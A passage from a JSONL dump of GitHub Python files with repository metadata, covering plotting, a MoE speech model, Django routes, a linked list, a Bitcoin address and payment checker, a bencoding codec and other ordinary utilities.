= \"../CSV_files/Q1.csv\"\n data = np.loadtxt(filename, dtype=str, delimiter=';')\n data = np.delete(data, -1, axis=1)\n data = data.astype(np.float)\n self.values = np.array(data)\n self.data = data\n\n\n # Establishes the 2D grid to display\n def create_grid(self):\n self.X = np.linspace(0, len(self.data[0,:]), len(self.data[0,:])+1)\n self.Y = np.linspace(0, len(self.data[:,0]), len(self.data[:,0])+1)\n\n\n def show_scalar_field(self):\n plt.pcolormesh(self.X, self.Y, self.values, cmap=plt.get_cmap(\"bwr\"))\n neg_patch = mpatches.Patch(color='red', label='-ve')\n pos_patch = mpatches.Patch(color='blue', label='+ve')\n plt.legend(handles=[neg_patch, pos_patch])\n\n\n def show_field_lines(self):\n dx, dy = np.gradient(self.data)\n dx = np.column_stack((dx[:,0], dx))\n dy = np.column_stack((dy[:,0], dy))\n #print(len(self.X))\n #print(len(self.Y[:-1]))\n #print(len(dx[0]))\n #print(len(dx))\n plt.streamplot(self.X, self.Y[:-1], dy, dx, color='black')\n\n\n\n def show_equipotential(self):\n #print(\"\\n\")\n #print(len(self.X))\n #print(len(self.Y))\n #eBoundaryPlotter.single_point(1,1,1)\n #print(len(self.values[0]))\n #print(len(self.values))\n plt.contour(self.X[:-1], self.Y[:-1], self.values, 15, colors=\"grey\", linestyles=\"solid\")\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = Electrostatics()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"Spengarcor/numelectrostatics","sub_path":"QT/electrostatics_load.py","file_name":"electrostatics_load.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21956844456","text":"from datetime import datetime\n\n\ndef start_cron_job_notes_in_minutes():\n start_job_date = datetime(year=datetime.today().year,\n month=datetime.today().month,\n day=datetime.today().day + 1,\n hour=7, minute=0, second=0)\n datetime_now = datetime.now()\n\n diff = start_job_date - datetime_now\n return diff.seconds / 60\n\n\n# def cron_job_notes_recall():\n# data = query_user_notes()\n# if data:\n# data_to_send = preapare_data_for_sending(data)\n# result = send_email(data_to_send, nginx_host=app.config.get(\"NGINX_HOST\"))\n# if result:\n# logging.error(\"mail sent successfully\")\n# else:\n# logging.error(\"sending mail failed\")\n# else:\n# logging.info(\"CRON::: no data to send\")","repo_name":"wlapie40/reminder-app-py38","sub_path":"services/web/src/common/cron_job.py","file_name":"cron_job.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72482243752","text":"import os.path\r\nimport argparse\r\nimport sys\r\n\r\n\r\nclass LogParser:\r\n\r\n @staticmethod\r\n def parse_log(input_file, string_to_find):\r\n out = []\r\n with open(input_file) as file:\r\n data = file.read()\r\n file.close()\r\n splitted = data.split( \"\\n\" )\r\n for word in splitted:\r\n if string_to_find in word:\r\n out.append(word)\r\n return out\r\n\r\n @staticmethod\r\n def get_parsed():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"File\")\r\n arg = parser.parse_args()\r\n return arg.File\r\n\r\n @staticmethod\r\n def save(file, out):\r\n with open(file, \"w\") as out_file:\r\n for line in out:\r\n out_file.write(line)\r\n out_file.write(\"\\n\")\r\n out_file.close()\r\n\r\nclass InputFileValidator():\r\n @staticmethod\r\n def validate(file_name):\r\n if os.path.isfile(file_name):\r\n return True\r\n else:\r\n sys.exit(\"file doesn't exist\")\r\n\r\n\r\nif __name__ == '__main__':\r\n File = LogParser.get_parsed()\r\n if InputFileValidator.validate(File):\r\n parsed = LogParser.parse_log(File, \"PrChecker.Downs\")\r\n LogParser.save(\"out.txt\", parsed)\r\n # os.system(\"jupyter notebook ./out_jupyter.txt\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"piotrcholody/Calculator","sub_path":"lab1/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72228917994","text":"from typing import Tuple, List, Optional, Dict, Any\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributed as dist\n\nfrom model.encoder import BaseCTCEncoder\nfrom model.conformer import Net as ConformerEmbed\nfrom layer.encoder_layer import FmoeConformerLayer\nfrom layer.positionwise_feed_forward import PositionwiseFeedForward\nfrom layer.positionwise_feed_forward import FmoeCatEmbedFeedForward\nfrom layer.attention import MultiHeadedAttention\nfrom layer.attention import RelPositionMultiHeadedAttention\nfrom layer.convolution import ConvolutionModule\nfrom utils.common import get_activation\nfrom utils.mask import make_pad_mask\nfrom utils.mask import add_optional_chunk_mask\nfrom loss.loss_compute import MoELayerScaleAuxLoss\n\n\nclass Net(BaseCTCEncoder):\n def __init__(\n self,\n input_dim: int,\n output_dim: int,\n blank_idx: int = 0,\n attention_heads: int = 4,\n attention_dim: int = 256,\n linear_units: int = 2048,\n num_blocks: int = 6,\n dropout_rate: float = 0.1,\n positional_dropout_rate: float = 0.1,\n attention_dropout_rate: float = 0.0,\n input_layer: str = \"conv2d\",\n pos_enc_layer_type: str = \"rel_pos\",\n normalize_before: bool = True,\n concat_after: bool = False,\n static_chunk_size: int = 0,\n use_dynamic_chunk: bool = False,\n use_dynamic_left_chunk: bool = False,\n macaron_style: bool = True,\n selfattention_layer_type: str = \"rel_selfattn\",\n activation_type: str = \"swish\",\n use_cnn_module: bool = True,\n cnn_module_kernel: int = 15,\n causal: bool = False,\n cnn_module_norm: str = \"batch_norm\",\n conv_subsample_in_ch: int = 1,\n embed_conf: Optional[Dict[str, Any]] = None,\n moe_conf: Optional[Dict[str, Any]] = None,\n embed_scale: float = 0.0,\n aux_scale: Optional[List[float]] = None\n ):\n super().__init__(\n input_dim, output_dim, blank_idx, attention_heads, attention_dim,\n linear_units, num_blocks, dropout_rate, positional_dropout_rate,\n attention_dropout_rate, input_layer, pos_enc_layer_type,\n normalize_before, concat_after, static_chunk_size,\n use_dynamic_chunk, use_dynamic_left_chunk, conv_subsample_in_ch)\n activation = get_activation(activation_type)\n # embedding network\n if embed_conf is None:\n embed_conf = {} # use default config of construction function\n self.embed = ConformerEmbed(input_dim, output_dim, **embed_conf)\n self.embed_scale = embed_scale\n # moe conf\n self.moe_conf = {\n 'rank': 0,\n 'world_size': 1,\n 'comm': None,\n 'num_experts': 4,\n 'hidden_units': 1024,\n 'dropout_rate': 0.0,\n 'activation': activation,\n 'capacity_factor': -1.0,\n 'router_regularization': 'l1_plus_importance',\n 'router_with_bias': False,\n 'keep_expert_output': False,\n 'rand_init_router': False\n }\n if moe_conf is not None:\n self.moe_conf.update(moe_conf)\n if self.moe_conf['router_regularization'] == 'l1_plus_importance':\n num_aux = 2\n if aux_scale is not None:\n assert len(aux_scale) == num_aux\n else:\n aux_scale = [0.1] * num_aux\n self.aux_tags = [\"sparse_loss\", \"balance_loss\"]\n aux_minimum = [num_blocks] * num_aux\n else:\n raise NotImplementedError(\"router regularization {} not supported\".format(\n self.moe_conf['router_regularization']))\n # aux criterion\n self.aux_criterion = MoELayerScaleAuxLoss(num_aux, aux_scale, aux_minimum)\n # attention layer\n if pos_enc_layer_type == \"no_pos\":\n selfattn_layer = MultiHeadedAttention\n else:\n selfattn_layer = RelPositionMultiHeadedAttention\n san_layer_args = (\n attention_heads,\n attention_dim,\n attention_dropout_rate,\n )\n # feed-forward module in conformer\n moe_positionwise_layer = FmoeCatEmbedFeedForward\n positionwise_layer = PositionwiseFeedForward\n positionwise_layer_args = (\n attention_dim,\n self.moe_conf['hidden_units'],\n self.moe_conf['dropout_rate'],\n activation,\n )\n # convolution module in attention\n convolution_layer = ConvolutionModule\n convolution_layer_args = (\n attention_dim,\n cnn_module_kernel,\n activation,\n cnn_module_norm,\n causal,\n )\n # encoder blocks\n embed_dim = self.embed.encoder_embed_dim\n self.blocks = torch.nn.ModuleList([\n FmoeConformerLayer(\n attention_dim,\n selfattn_layer(*san_layer_args),\n moe_positionwise_layer(attention_dim, embed_dim, **self.moe_conf),\n positionwise_layer(*positionwise_layer_args) if macaron_style else None,\n convolution_layer(*convolution_layer_args) if use_cnn_module else None,\n dropout_rate,\n normalize_before,\n concat_after,\n ) for _ in range(num_blocks)\n ])\n\n def init_embed_model(self, load_path):\n param_dict = torch.load(load_path, map_location='cpu')\n self.embed.load_state_dict(param_dict)\n\n def init_experts_from_base(self, load_path):\n param_dict = torch.load(load_path, map_location='cpu')\n model_dict = self.state_dict()\n load_param_list = []\n for k, v in model_dict.items():\n if k in param_dict and param_dict[k].size() == v.size():\n model_dict[k] = param_dict[k]\n load_param_list.append(k)\n elif \"experts\" in k:\n ori_k = k.replace(\"experts.\", \"\")\n if ori_k in param_dict and param_dict[ori_k].size() == v.size()[1:]:\n model_dict[k] = param_dict[ori_k].unsqueeze(0).expand(v.size())\n load_param_list.append(k)\n load_param_list.sort()\n self.load_state_dict(model_dict)\n return load_param_list\n\n def forward(\n self,\n xs: torch.Tensor,\n xs_lens: torch.Tensor,\n decoding_chunk_size: int = 0,\n num_decoding_left_chunks: int = -1\n ) -> Dict[str, Any]:\n \"\"\"\n Args:\n xs: padded input tensor (B, T, D)\n xs_lens: input length (B)\n decoding_chunk_size: decoding chunk size for dynamic chunk\n 0: default for training, use random dynamic chunk.\n <0: for decoding, use full chunk.\n >0: for decoding, use fixed chunk size as set.\n num_decoding_left_chunks: number of left chunks, this is for decoding,\n the chunk size is decoding_chunk_size.\n >=0: use num_decoding_left_chunks\n <0: use all left chunks\n \"\"\"\n masks = ~make_pad_mask(xs_lens).unsqueeze(1) # (B, 1, T)\n input_bk = xs\n xs, masks = self.subsampling(xs, masks)\n xs, pos_emb = self.pos_enc(xs)\n mask_pad = masks # (B, 1, T/subsample_rate)\n chunk_masks = add_optional_chunk_mask(xs, masks,\n self.use_dynamic_chunk,\n self.use_dynamic_left_chunk,\n decoding_chunk_size,\n self.static_chunk_size,\n num_decoding_left_chunks)\n # use the same chunk mask for embedding network\n embedding_res = self.embed(\n input_bk, xs_lens, given_chunk_mask=chunk_masks)\n embedding = embedding_res['hidden']\n embedding = embedding.detach()\n embed_out = embedding_res['out_nosm']\n\n aux_loss_collection = []\n for layer in self.blocks:\n xs, aux_loss_res, chunk_masks, _ = layer(\n xs, embedding, chunk_masks, pos_emb, mask_pad)\n for aux_loss in aux_loss_res:\n aux_loss_collection.append(aux_loss)\n if self.normalize_before:\n xs = self.after_norm(xs)\n out_nosm = self.out_linear(xs)\n out_lens = masks.sum(dim=-1).view(-1)\n res = {\n \"out_nosm\": out_nosm,\n \"out_lens\": out_lens,\n \"hidden\": xs,\n \"embed_out_nosm\": embed_out,\n \"aux_loss\": aux_loss_collection,\n }\n return res\n\n @property\n def metric_tags(self):\n tags = ['ctc_loss']\n if self.embed_scale > 0.0:\n tags += ['embed_ctc_loss']\n tags += self.aux_tags\n return tags\n\n def cal_loss(self, res, target, targer_lens):\n out_nosm = res['out_nosm']\n out_lens = res['out_lens']\n embed_out_nosm = res['embed_out_nosm']\n aux_loss = res['aux_loss']\n # ctc\n loss, metric, count = self.ctc_criterion(\n out_nosm, out_lens, target, target_lens)\n # embed ctc\n if self.embed_scale > 0.0:\n loss_embed, metric_embed, count_embed = self.ctc_criterion(\n embed_out_nosm, out_lens, target, target_lens)\n loss += self.embed_scale * loss_embed\n metric += metric_embed\n count += count_embed\n # aux loss for moe routers\n loss_aux, metric_aux, count_aux = self.aux_criterion(aux_loss)\n loss += loss_aux\n metric += metric_aux\n count += count_aux\n return loss, metric, count\n\n def state_dict_comm(self):\n local_state_dict = self.state_dict()\n rank = self.moe_conf['rank']\n world_size = self.moe_conf['world_size']\n num_experts = self.moe_conf['num_experts']\n comm = self.moe_conf['comm']\n if world_size <= 1:\n return local_state_dict\n else:\n new_state_dict = OrderedDict()\n all_experts_num = world_size * num_experts\n for k, v in local_state_dict.items():\n if \"experts\" not in k:\n new_state_dict[k] = v\n else:\n new_size = list(v.size())\n new_size[0] = all_experts_num\n experts_weight = v.data.new_zeros(*new_size)\n experts_weight[rank * num_experts: (rank + 1) * num_experts] = v\n dist.all_reduce(experts_weight, group=comm, async_op=False)\n new_state_dict[k] = experts_weight\n return new_state_dict\n\n def load_state_dict_comm(self, whole_model_state):\n rank = self.moe_conf['rank']\n world_size = self.moe_conf['world_size']\n num_experts = self.moe_conf['num_experts']\n if world_size <= 1:\n return self.load_state_dict(whole_model_state)\n else:\n new_state_dict = OrderedDict()\n for k, v in whole_model_state.items():\n if \"experts\" not in k:\n new_state_dict[k] = v\n else:\n assert v.size(0) == num_experts * world_size\n new_state_dict[k] = v[rank * num_experts: (rank + 1) * num_experts]\n return self.load_state_dict(new_state_dict)\n","repo_name":"tencent-ailab/3m-asr","sub_path":"trainer/model/conformer_moe_catEmbed.py","file_name":"conformer_moe_catEmbed.py","file_ext":"py","file_size_in_byte":11484,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"72"} +{"seq_id":"25893471063","text":"import torch\nfrom torch import nn\nfrom . import utils\n\nimport normflows as nf\n\nclass ConvNet2d(nn.Module):\n \"\"\"\n Convolutional Neural Network with leaky ReLU nonlinearities and a\n final fully connected output layer\n \"\"\"\n\n def __init__(self, channels, output_units, kernel_size=3, stride=1,\n leaky=0.0, output_fn=None, init_zeros=False):\n \"\"\"\n Constructor\n :param channels: List of channels of conv layers, first entry is in_channels\n :param kernel_size: Int of list of ints, same for height and width, if int\n same kernel size for each layer is chosen\n :param output_units: List of two ints\n :param stride: Int or list of int, if int same stride for all layers is used\n :param leaky: Leaky part of ReLU\n :param output_fn: String, function to be applied to the output, either\n None, \"sigmoid\", or \"clampexp\"\n :param init_zeros: Flag whether last layer should be initialized with zeros\n \"\"\"\n super().__init__()\n # Prepare parameters\n n_layers = len(channels) - 1\n if isinstance(stride, int):\n stride = n_layers * [stride]\n if isinstance(kernel_size, int):\n kernel_size = n_layers * [kernel_size]\n # Build network\n net = nn.ModuleList([])\n for i in range(n_layers):\n net.append(nn.Conv2d(channels[i], channels[i + 1], kernel_size[i],\n stride=stride[i], padding=kernel_size[i] // 2))\n net.append(nn.LeakyReLU(leaky))\n net.append(nn.Flatten())\n lin = nn.Linear(*output_units)\n if init_zeros:\n nn.init.zeros_(lin.weight)\n nn.init.zeros_(lin.bias)\n net.append(lin)\n if output_fn == \"sigmoid\":\n net.append(nn.Sigmoid())\n elif output_fn == \"clampexp\":\n net.append(nf.utils.ClampExp())\n self.net = nn.Sequential(*net)\n\n def forward(self, x):\n if x.dim() == 3:\n x = x.view(-1, 1, x.size(1), x.size(2))\n return self.net(x)","repo_name":"VincentStimper/resampled-base-flows","sub_path":"larsflow/nets.py","file_name":"nets.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"41317401134","text":"from django.urls import path\nfrom . import views\n\napp_name = 'empregos'\nurlpatterns = [\n path('', views.home, name='home'),\n path('contas/login/', views.login_view, name='login'),\n path('contas/logout/', views.logout_view, name='logout'),\n path('contas/registro/', views.registro_view, name='registro'),\n path('vagas/', views.vagas_view, name='vagas'),\n path('vagas/criar', views.criar_vaga, name='criar_vaga'),\n path('vagas/deletar//', views.deletar_vaga, name='deletar_vaga'),\n path('editar_vaga//', views.editar_vaga, name='editar_vaga'),\n path('vagas/ver', views.ver_vagas, name='ver_vagas'),\n path('vagas/filtrar', views.filtrar_vagas, name='filtrar_vagas'),\n path('aplicar_vaga/', views.aplicar_vaga, name='aplicar_vaga'),\n path('cancelar_aplicacao/', views.cancelar_aplicacao, name='cancelar_aplicacao'),\n path('vagas_aplicadas/', views.vagas_aplicadas, name='vagas_aplicadas'),\n path('relatorio/', views.relatorio, name='relatorio'),\n]\n","repo_name":"rafafelli/projetovagas","sub_path":"empregos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"gl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38545167837","text":"n = int(input())\narr = list(map(int,input().split()))\nif n==1:\n print(0)\nelse:\n lst= [0 for i in range(n)]\n for i in range(len(arr)):\n if arr[i] == 0:\n continue\n else:\n num = arr[i]\n for j in range(1,num+1):\n if (i+j) < n :\n if i==0:\n lst[i+j] = lst[i]+1\n elif lst[i+j] == 0 and lst[i]!=0:\n lst[i+j] = lst[i]+1\n else:\n lst[i+j] = min(lst[i]+1,lst[i+j])\n\n if lst[-1]!=0:\n print(lst[-1])\n else:\n print(-1)","repo_name":"mkdevelop5002/Cording_Test_record","sub_path":"bakjoon_11060.py","file_name":"bakjoon_11060.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43134684439","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'xiaowang'\n__date__ = '19/11/15'\n\n\"\"\"节点类\"\"\"\n\n\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.nex = None\n\n\nclass LinkedList(object):\n def __init__(self):\n \"\"\"初始化链表\"\"\"\n self.head = None\n\n \"\"\"获取链表长度\"\"\"\n\n def __len__(self):\n pre = self.head\n length = 0\n while pre:\n length += 1\n pre = pre.nex\n return length\n\n \"\"\"判断链表是否为空\"\"\"\n\n def is_empty(self):\n return False if len(self) > 0 else True\n\n \"\"\"追加节点\"\"\"\n\n def append(self, data):\n \"\"\"\n 1.head 为none :head-->node\n 2.tail.nex-->node\n :param data:\n :return:\n \"\"\"\n node = Node(data)\n if self.head is None:\n self.head = node\n else:\n pre = self.head\n while pre.nex:\n pre = pre.nex\n pre.nex = node\n\n \"\"\"插入节点\"\"\"\n\n def insert(self, index, data):\n \"\"\"\n 1.index 插入节点位置包括正负数\n 2.找到index-1-->pre_node的节点\n 3.pre_node.next-->node\n node.next-->pre_node.next.next\n 4.head\n :param index:\n :param data:\n :return:\n \"\"\"\n node = Node(data)\n if abs(index + 1) > len(self):\n return False\n index = index if index >= 0 else len(self) + index + 1\n if index == 0:\n node.nex = self.head\n self.head = node\n else:\n pre = self.get(index - 1)\n if pre:\n nex = pre.nex\n pre.nex = node\n node.nex = nex\n else:\n return False\n return node\n\n \"\"\"反转链表\"\"\"\n\n def __reversed__(self):\n \"\"\"\n 1.pre-->next 转变为 next-->pre\n 2.pre 若是head 则把 pre.nex --> None\n 3.tail-->self.head\n :return:\n \"\"\"\n\n def reverse(pre_node, node):\n if pre_node is self.head:\n pre_node.nex = None\n if node:\n next_node = node.nex\n node.nex = pre_node\n return reverse(node, next_node)\n else:\n self.head = pre_node\n\n return reverse(self.head, self.head.nex)\n\n \"\"\"获取节点\"\"\"\n\n def get(self, index):\n \"\"\"\n :param index:\n :return:\n \"\"\"\n index = index if index >= 0 else len(self) + index\n if len(self) < index or index < 0:\n return None\n pre = self.head\n while index:\n pre = pre.nex\n index -= 1\n return pre\n\n \"\"\"设置节点\"\"\"\n\n def set(self, index, data):\n node = self.get(index)\n if node:\n node.data = data\n return node\n\n \"\"\"删除某个元素\"\"\"\n\n def delete(self, index):\n f = index if index > 0 else abs(index + 1)\n if len(self) <= f:\n return False\n pre = self.head\n index = index if index >= 0 else len(self) + index\n prep = None\n while index:\n prep = pre\n pre = pre.nex\n index -= 1\n if not prep:\n self.head = pre.nex\n else:\n prep.nex = pre.nex\n return pre.data\n\n \"\"\"清空链表\"\"\"\n\n def clear(self):\n self.head = None\n\n \"\"\"打印链表\"\"\"\n\n def show(self):\n pre = self.head\n while pre:\n print(pre.data, end=\" \")\n pre = pre.nex\n print()\n\n\nif __name__ == '__main__':\n ls = LinkedList()\n ls.append(1)\n ls.append(2)\n ls.append(3)\n ls.insert(-1, 10)\n ls.show()\n print(ls.get(-1).data)\n reversed(ls)\n ls.show()\n print(ls.get(0).data)\n ls.show()\n ls.delete(2)\n ls.show()\n ls.set(-12, 20)\n ls.show()\n","repo_name":"wangpanjun/datastructure","sub_path":"linkedlist/singleLinkedList.py","file_name":"singleLinkedList.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"9181937530","text":"from django.conf import settings\nfrom bip32utils import BIP32Key\nfrom datetime import datetime\nimport requests\nimport logging\n\nlogger = logging.getLogger('vitashop.checkout')\n\ndef get_currency(request):\n if 'currency' in request.session:\n return request.session['currency']\n else:\n return settings.PRIMARY_CURRENCY\n\ndef get_language(request):\n if hasattr(request, 'LANGUAGE_CODE'):\n return request.LANGUAGE_CODE\n else:\n return 'en'\n\ndef track_it(func):\n \"\"\"\n decorator for tracking / logging code use: @track_it\n \"\"\"\n def inner(*args, **kwargs):\n t1 = datetime.now()\n logger.debug('func %s started' % func.func_name)\n ret = func(*args, **kwargs)\n t2 = datetime.now()\n delta = t2 - t1\n duration = 'Process time: %sms' % int(delta.total_seconds() * 1000)\n logger.debug('func #%s# ended. %s' % (func.func_name, duration))\n return ret\n\n return inner\n\nclass Blockchain(object):\n\n SATOSHI = 100000000\n api_uri = 'https://insight.bitpay.com/api'\n #\n # {\"addrStr\": \"1DYCkkJePht4T3hpB68DBktv7AB97GnrwY\",\n # \"balance\": 0.00109326,\n # \"balanceSat\": 109326,\n # \"totalReceived\": 0.00109326,\n # \"totalReceivedSat\": 109326,\n # \"totalSent\": 0,\n # \"totalSentSat\": 0,\n # \"unconfirmedBalance\": 0,\n # \"unconfirmedBalanceSat\": 0,\n # \"unconfirmedTxApperances\": 0,\n # \"txApperances\": 1,\n # \"transactions\": [\"2806ec1144e3613d11756841648a7af39fe9405d3457a72af2df767979412a59\"]}\n\n @classmethod\n def get_address_info(cls, addr):\n r = requests.get('%s/addr/%s' % (cls.api_uri, addr))\n return r.json()\n\nclass Address(object):\n\n def __init__(self):\n self.desc = ''\n self.address = ''\n self.balance = 0\n self.unconfirmed_balance = 0\n\n\nclass Account(object):\n\n def __init__(self, xpub):\n self.addresses = []\n self.transactions = []\n self.mask = 'm/1/0/'\n self.account = BIP32Key.fromExtendedKey(xpub)\n self.ext_node = self.account.ChildKey(0)\n\n def gen_new_address(self, order_id):\n addr_node = self.ext_node.ChildKey(order_id)\n address = addr_node.Address()\n return address\n\n def check_order_for_payment(self, order):\n confirmed = 0\n try:\n addr = self.check_address_for_payment(order.wallet_address)\n confirmed = addr.balance / Blockchain.SATOSHI\n except Exception as ex:\n logger.error(ex)\n\n if confirmed >= order.price:\n return True\n else:\n return False\n\n\n def check_address_for_payment(self, address):\n j = Blockchain.get_address_info(address)\n a = Address()\n a.address = str(j['addrStr'])\n a.balance = int(j['totalReceivedSat'])\n a.unconfirmed_balance = int(j['unconfirmedBalanceSat'])\n return a\n","repo_name":"totoropy/joeshop","sub_path":"vitashop/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1184220515","text":"# file_name: wake_up.py\n# file_function:\n# 1. 눈깜빡임 쓰레드 실행\n# 2. 구구단 쓰레드 실행\n\n\nimport sys\nfrom threading import Thread\n\nsys.path.append('/home/pi/Wake_up_genie/python')\nprint(sys.path)\n\nimport call_genie as cg\nimport ai_eye_blink as eb\n\n\n\n\ndef main():\n\n\tt = Thread(target=cg.main) #구구단 쓰레드\n\tth = Thread(target=eb.main) # 눈깜빡임 쓰레드\n\tt.deamon = True\n\tth.deamon = True\n\tt.start() #구구단 쓰레드 실행\n\tth.start() # 눈깜빡임 쓰레드\n\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"2021-KT-Intern-Team6/Wake-up-genie","sub_path":"ai_camera/wake_up.py","file_name":"wake_up.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30188774478","text":"import requests\nfrom rest_framework.exceptions import ValidationError\nfrom RecipesAPI.constants import HUNTER_API_KEY, CLEARBIT_API_KEY\nimport clearbit\n\n\ndef email_validation(email):\n detected = False\n apiUrl = f'https://api.hunter.io/v2/email-verifier?email={email}&api_key={HUNTER_API_KEY}'\n\n response = requests.get(apiUrl)\n\n result = response.json()\n if result['data']['status'] not in ['verified', 'accept_all', 'webmail']:\n raise ValidationError({'message': 'This email is not valid!'})\n \n detected = True\n\n return detected\n\n\ndef clearbit_info(email):\n clearbit.key = CLEARBIT_API_KEY\n\n clearbit_data = clearbit.Person.find(email=email)\n\n return clearbit_data","repo_name":"MirkoMilanovic/Recipes_API","sub_path":"users/external_api.py","file_name":"external_api.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73014091433","text":"#!/usr/bin/env python3.5\n\nimport collections\nimport itertools\n\ntry:\n rang = xrange\nexcept NameError:\n pass\n\n\ndef encode(obj):\n '''\n Bencode Python built-in types into data.\n '''\n\n if isinstance(obj, bytes):\n return b'%i:%s' % (len(obj), obj)\n elif isinstance(obj, int):\n contents = b'i%ie' % (obj)\n return contents\n elif isinstance(obj, list):\n values = b''.join([encode(o) for o in obj])\n return b'l%se' % (values)\n elif isinstance(obj, dict):\n items = sorted(obj.items())\n values = b''.join([encode(key) + encode(value)\n for key, value in items])\n return b'd%se' % (values)\n else:\n raise TypeError('Unsupported type: {0}.'.format(type(obj)))\n\n\ndef decode(data):\n '''\n Bdecode data into Python built-in types.\n '''\n\n return consume(LookaheadIterator([bytes([b]) for b in data]))\n\n\nclass LookaheadIterator(collections.Iterator):\n '''\n A Iterator that lets you peek at next item.\n '''\n\n def __init__(self, iterator):\n self.iterator, self.next_iterator = itertools.tee(iter(iterator))\n\n self._advance()\n\n def _advance(self):\n self.next_item = next(self.next_iterator, None)\n\n def __next__(self):\n self._advance()\n\n return next(self.iterator)\n\n\ndef consume(stream):\n item = stream.next_item\n\n if item is None:\n raise ValueError('Encoding empty data is undefined')\n elif item == b'i':\n return consume_int(stream)\n elif item == b'l':\n return consume_list(stream)\n elif item == b'd':\n return consume_dict(stream)\n elif item.isdigit():\n return consume_str(stream)\n else:\n raise ValueError('Invalid beconde object type: ', item)\n\n\ndef consume_number(stream):\n result = b''\n\n while True:\n chunk = stream.next_item\n\n if not chunk.isdigit():\n return result\n elif result.startswith(b'0'):\n raise ValueError('Invalid number')\n\n next(stream)\n result += chunk\n\n\ndef consume_int(stream):\n if (next(stream)) != b'i':\n raise ValueError()\n\n negative = stream.next_item == b'-'\n\n if negative:\n next(stream)\n\n result = int(consume_number(stream))\n\n if negative:\n result *= -1\n\n if result == 0:\n raise ValueError('Negative zero is not allowed')\n\n if next(stream) != b'e':\n raise ValueError('Unterminated integer')\n\n return result\n\n\ndef consume_str(stream):\n length = int(consume_number(stream))\n\n if next(stream) != b':':\n raise ValueError('Malformed string')\n\n result = b''\n\n for _ in range(length):\n try:\n result += next(stream)\n except StopIteration:\n raise ValueError('Invalid string length')\n\n return result\n\n\ndef consume_list(stream):\n if next(stream) != b'l':\n raise ValueError()\n\n l = []\n\n while stream.next_item != b'e':\n l.append(consume(stream))\n\n if next(stream) != b'e':\n raise ValueError('Unterminated list')\n\n return l\n\n\ndef consume_dict(stream):\n if next(stream) != b'd':\n raise ValueError()\n\n d = {}\n\n while stream.next_item != b'e':\n key = consume(stream)\n value = consume(stream)\n d[key] = value\n\n if next(stream) != b'e':\n raise ValueError('Unterminated dictionary')\n\n return d\n","repo_name":"yang-le/bt","sub_path":"bencoding.py","file_name":"bencoding.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18019424299","text":"# Starter Code\nclass Solution:\n def calculate_degree(self, hours, minutes):\n angle = 10.56\n # Write your code here without removing the existing code\n # 'hours' and 'minutes' are input variables in integer format.\n # modified the double 'angle' contain the output of the program.\n return angle\n\n\nif __name__ == '__main__':\n n = int(input())\n m = int(input())\n x = Solution()\n ans = x.calculate_degree(n, m)\n print(\"%.5f\" % ans)\n","repo_name":"Kartikay123/Problem-Setter-Intern","sub_path":"clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33068502781","text":"import logging\nimport os\nfrom pathlib import Path\nfrom typing import Literal, Optional, Union\n\nimport torch\nfrom lightning.pytorch import seed_everything\nfrom rich.console import Console\nfrom rich.logging import RichHandler\n\nscvi_logger = logging.getLogger(\"scvi\")\n\n\nclass ScviConfig:\n \"\"\"Config manager for scvi-tools.\n\n Examples\n --------\n To set the seed\n\n >>> scvi.settings.seed = 1\n\n To set the batch size for functions like `SCVI.get_latent_representation`\n\n >>> scvi.settings.batch_size = 1024\n\n To set the progress bar style, choose one of \"rich\", \"tqdm\"\n\n >>> scvi.settings.progress_bar_style = \"rich\"\n\n To set the verbosity\n\n >>> import logging\n >>> scvi.settings.verbosity = logging.INFO\n\n To set the number of threads PyTorch will use\n\n >>> scvi.settings.num_threads = 2\n\n To prevent Jax from preallocating GPU memory on start (default)\n\n >>> scvi.settings.jax_preallocate_gpu_memory = False\n \"\"\"\n\n def __init__(\n self,\n verbosity: int = logging.INFO,\n progress_bar_style: Literal[\"rich\", \"tqdm\"] = \"tqdm\",\n batch_size: int = 128,\n seed: Optional[int] = None,\n logging_dir: str = \"./scvi_log/\",\n dl_num_workers: int = 0,\n jax_preallocate_gpu_memory: bool = False,\n warnings_stacklevel: int = 2,\n ):\n self.warnings_stacklevel = warnings_stacklevel\n self.seed = seed\n self.batch_size = batch_size\n if 